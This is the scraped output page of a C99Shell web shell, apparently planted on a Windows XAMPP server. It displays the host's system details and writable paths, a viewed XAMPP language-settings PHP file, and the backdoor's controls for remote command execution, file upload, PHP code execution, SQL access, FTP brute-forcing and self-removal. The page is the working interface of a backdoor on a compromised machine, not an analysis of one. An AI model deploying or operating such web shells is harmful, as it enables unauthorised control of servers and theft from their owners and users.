!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\xampp\   drwxrwxrwx
Free 8.81 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     langsettings.php (997 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    error_reporting
(E_ALL & ~E_NOTICE & ~E_DEPRECATED);

    
$lang = @file_get_contents('../../install/xampp_language.txt');
    @include 
'lang/languages.php';
    @include 
'lang/en.php';
    @include 
"lang/$lang.php";
    if (
$lang == 'zh') {
        
header("Content-Type: text/html; charset=gb2312");
    } elseif (
$lang == 'jp') {
        
header("Content-Type: text/html; charset=shift-jis");
    } else {
        
header("Content-Type: text/html; charset=iso-8859-1");
    }

    function 
stripslashes_deep($value) {
        
$value is_array($value) ? array_map('stripslashes_deep'$value) : stripslashes($value);
        return 
$value;
    }
    if (
get_magic_quotes_gpc()) {
        
$_POST stripslashes_deep($_POST);
        
$_GET stripslashes_deep($_GET);
        
$_COOKIE stripslashes_deep($_COOKIE);
        
$_REQUEST stripslashes_deep($_REQUEST);
    }

    if (
get_magic_quotes_runtime()) {
        
set_magic_quotes_runtime(false);
    }
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--